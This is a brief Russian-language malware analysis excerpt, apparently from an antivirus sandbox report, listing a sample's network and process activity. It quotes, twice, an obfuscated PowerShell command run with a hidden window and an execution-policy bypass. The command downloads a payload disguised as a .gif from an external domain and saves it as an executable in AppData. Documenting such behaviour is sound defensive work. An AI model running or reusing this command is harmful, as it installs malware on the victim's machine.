Техническая информация
- http://www.wieekgodf.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWerShELL.eXe -ExecutIOnpOliCY BYPAsS -nOProFIle -wiNdOWStYLe HiDdEn (nEw-oBjecT sYSTeM.NEt.weBclIeNT).dOWnLoaDfIle('http://www.wieekgodf.top/read.php?f=1.gif','%Appdata%.EXE');...
- DNS ASK wi###godf.top
- '<SYSTEM32>\cmd.exe' /c "PoWerShELL.eXe -ExecutIOnpOliCY BYPAsS -nOProFIle -wiNdOWStYLe HiDdEn (nEw-oBjecT sYSTeM.NEt.weBclIeNT).dOWnLoaDfIle('http://www.wieekgodf.top/read.php?f=1.gif','%Appdata%.EXE');...' (со скрытым окном)